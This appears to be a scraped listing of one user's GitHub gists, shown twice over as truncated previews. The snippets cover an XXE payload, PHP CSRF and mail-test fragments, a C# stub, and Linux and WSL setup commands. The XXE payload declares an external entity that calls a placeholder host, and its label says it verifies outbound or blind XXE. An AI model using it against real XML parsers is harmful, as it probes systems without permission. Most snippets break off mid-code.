Seng Kyaut sengkyaut

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## index.php
<?php
// See: http://blog.ircmaxell.com/2013/02/preventing-csrf-attacks.html

// Start a session (which should use cookies over HTTP only).
session_start();

// Create a new CSRF token.
if (! isset($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = base64_encode(openssl_random_pseudo_bytes(32));
}

## mail-test.php
<?php

	/*
	DONT FORGET TO DELETE THIS SCRIPT WHEN FINISHED!
	*/

	ini_set( 'display_errors', 1 );
	error_reporting( E_ALL );

	$from = 'webmaster@example.com';

## 1-file.txt
foo bar
baz
qux

last line (there may or may not be a trailing newline after this line)

## Program.cs
using System;
using System.Diagnostics;

namespace peewpw
{
    static class Program
    {
        [STAThread]
        static void Main()
        {

## gist:25b327cada3902cd4c30f06fa949a019
sudo apt-get install python-glade2 python-appindicator
git clone https://github.com/Kilian/f.lux-indicator-applet.git
cd f.lux-indicator-applet
chmod +x setup.py
sudo ./setup.py install
fluxgui

## UPower.conf
# Only the system vendor should modify this file, ordinary users
# should not have to change anything.

[UPower]

# Enable the Watts Up Pro device.
#
# The Watts Up Pro contains a generic FTDI USB device without a specific
# vendor and product ID. When we probe for WUP devices, we can cause
# the user to get a perplexing "Device or resource busy" error when

## kali_xfce.txt
sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies

update-alternatives –config x-session-manager

## add 32 bit architecture in 64 bit Linux.txt
Commands
------------------------------------------
dpkg --print-architecture

sudo dpkg --add-architecture i386 && sudo apt update

apt-get install lib32z1 lib32ncurses5 lib32stdc++6
------------------------------------------
dpkg --add-architecture i386   (enable multi-arch)

## 32-bit support in WSL.txt
https://github.com/microsoft/wsl/issues/2468#issuecomment-374904520
sudo service binfmt-support start
https://github.com/WhitewaterFoundry/Pengwin/issues/273#issuecomment-451274200

Based on some tinkering I was doing with qemu for some ARM dev, I think I may have found a technique to allow general 32-bit support in WSL. Hat-tip to @therealkenc for the concept 😁

Edit: requires "Fall Creators Update", 1709, build 16299 or newer (I think)

Presuming a fresh Ubuntu WSL instance, you'll need to install the qemu-user-static package, add the i386 binfmt, enable the i386 architecture, update your package lists, and install some i386 packages:
Install qemu and binfmt
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	<?php
	// See: http://blog.ircmaxell.com/2013/02/preventing-csrf-attacks.html

	// Start a session (which should use cookies over HTTP only).
	session_start();

	// Create a new CSRF token.
	if (! isset($_SESSION['csrf_token'])) {
	$_SESSION['csrf_token'] = base64_encode(openssl_random_pseudo_bytes(32));
	}
	<?php

	/*
	DONT FORGET TO DELETE THIS SCRIPT WHEN FINISHED!
	*/

	ini_set( 'display_errors', 1 );
	error_reporting( E_ALL );

	$from = 'webmaster@example.com';
	foo bar
	baz
	qux

	last line (there may or may not be a trailing newline after this line)
	using System;
	using System.Diagnostics;

	namespace peewpw
	{
	static class Program
	{
	[STAThread]
	static void Main()
	{
	sudo apt-get install python-glade2 python-appindicator
	git clone https://github.com/Kilian/f.lux-indicator-applet.git
	cd f.lux-indicator-applet
	chmod +x setup.py
	sudo ./setup.py install
	fluxgui
	# Only the system vendor should modify this file, ordinary users
	# should not have to change anything.

	[UPower]

	# Enable the Watts Up Pro device.
	#
	# The Watts Up Pro contains a generic FTDI USB device without a specific
	# vendor and product ID. When we probe for WUP devices, we can cause
	# the user to get a perplexing "Device or resource busy" error when
	sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies

	update-alternatives –config x-session-manager
	Commands
	------------------------------------------
	dpkg --print-architecture

	sudo dpkg --add-architecture i386 && sudo apt update

	apt-get install lib32z1 lib32ncurses5 lib32stdc++6
	------------------------------------------
	dpkg --add-architecture i386 (enable multi-arch)
	https://github.com/microsoft/wsl/issues/2468#issuecomment-374904520
	sudo service binfmt-support start
	https://github.com/WhitewaterFoundry/Pengwin/issues/273#issuecomment-451274200

	Based on some tinkering I was doing with qemu for some ARM dev, I think I may have found a technique to allow general 32-bit support in WSL. Hat-tip to @therealkenc for the concept 😁

	Edit: requires "Fall Creators Update", 1709, build 16299 or newer (I think)

	Presuming a fresh Ubuntu WSL instance, you'll need to install the qemu-user-static package, add the i386 binfmt, enable the i386 architecture, update your package lists, and install some i386 packages:
	Install qemu and binfmt